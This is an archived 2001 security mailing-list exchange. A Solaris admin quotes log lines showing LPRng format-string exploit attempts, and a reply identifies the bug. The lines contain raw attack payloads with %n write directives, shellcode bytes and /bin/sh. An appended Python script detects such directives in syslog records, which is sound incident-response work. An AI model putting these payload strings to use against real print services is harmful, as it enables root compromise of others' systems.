RE: solaris hack info required

From: Ivy Lane (ivylane24at_private)
Date: Fri Jun 29 2001 - 10:22:48 PDT


    This is called "trying to use LPR's logging function" to get a shell.
    This is the LPRng string format _syslog bug that theoretically could allow 
    root access.
    Read this:
    http://www.securityfocus.com/vdb/bottom.html?vid=1712
    
    Solaris 8 is not listed as vulnerable.
    
    Give the man a peanut!
    
    
    IN RESPONSE TO:
    *******************************************
    Hi,
    
    Any help you can give me would be appreciated.
    
    I've a Sun Netra X1 (Solaris 8) with a /var/adm/messages file full of these
    messages at frequent but irregular intervals (approx every 5-10 seconds for
    several hours).
    
    Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol request (66): BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    Jun 24 03:43:03 jim bsd-gw[13277]: [ID 315218 lpr.error] Invalid protocol request (66): BBB()*+XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    Jun 24 03:43:03 jim bsd-gw[13278]: [ID 315218 lpr.error] Invalid protocol request (66): BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.167u%301$nsecurity.i%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    Jun 24 03:43:03 jim bsd-gw[13279]: [ID 315218 lpr.error] Invalid protocol request (66): BBBXXXXXXXXXXXXXXXXXX%.136u%300$n%.41u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    Jun 24 03:43:04 jim bsd-gw[13280]: [ID 315218 lpr.error] Invalid protocol request (66): BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    
    Do any of you recognise this? If so, what should I be looking for to see if
    the hack was successful?
    
    TIA,
    Mark
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see:
    
    http://aris.securityfocus.com
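
The log pattern quoted in this thread can be flagged mechanically. The following is an added example, not part of either poster's message: it parses Solaris-style syslog records and marks those whose message carries printf write directives (`%n`, `%300$n`). The function names and the shortened sample lines are constructed for illustration, and a match shows an attempt only, not whether it succeeded.

```python
import re
from collections import Counter

# Solaris 8 syslog record: "Mon DD HH:MM:SS host proc[pid]: [ID n fac.level] message"
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\s(?P<proc>[^\[\s]+)"
    r"\[(?P<pid>\d+)\]:\s\[ID \d+ (?P<prio>\S+)\]\s(?P<msg>.*)$")
# Write directives: %n, %hn, %300$n ... (a bare "%n" can also occur in benign text)
WRITE = re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")
# Width/precision padding such as %.156u, normally seen next to the writes
PAD = re.compile(r"%\.?\d+[udx]")

# Constructed sample lines modelled on the records quoted above (payloads shortened).
SAMPLE = """\
Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol request (66): BBBXXXX%.156u%300$n%.21u%301$nsecurity%302$n/bin/sh
Jun 24 03:44:10 jim bsd-gw[13290]: [ID 315218 lpr.error] Invalid protocol request (66): hello
Jun 24 03:45:00 jim sshd[400]: [ID 800047 auth.info] Accepted password for mark
"""

def classify(line):
    """Return a dict describing one syslog record, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    msg = m["msg"]
    writes = WRITE.findall(msg)
    return {
        "ts": m["ts"], "host": m["host"], "proc": m["proc"],
        "pid": int(m["pid"]), "prio": m["prio"],
        "writes": len(writes),
        "pads": len(PAD.findall(msg)),
        "shell_string": "/bin/sh" in msg,
        "suspicious": bool(writes),
    }

def summarize(text):
    """Return (suspicious records, count of suspicious records per process name)."""
    records = (classify(l) for l in text.splitlines())
    hits = [r for r in records if r and r["suspicious"]]
    return hits, Counter(r["proc"] for r in hits)

if __name__ == "__main__":
    hits, by_proc = summarize(SAMPLE)
    for r in hits:
        print(r["ts"], r["proc"], r["pid"], "writes=%d pads=%d" % (r["writes"], r["pads"]))
    print(dict(by_proc))
```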
    
    



    This archive was generated by hypermail 2b30 : Sat Jun 30 2001 - 09:28:07 PDT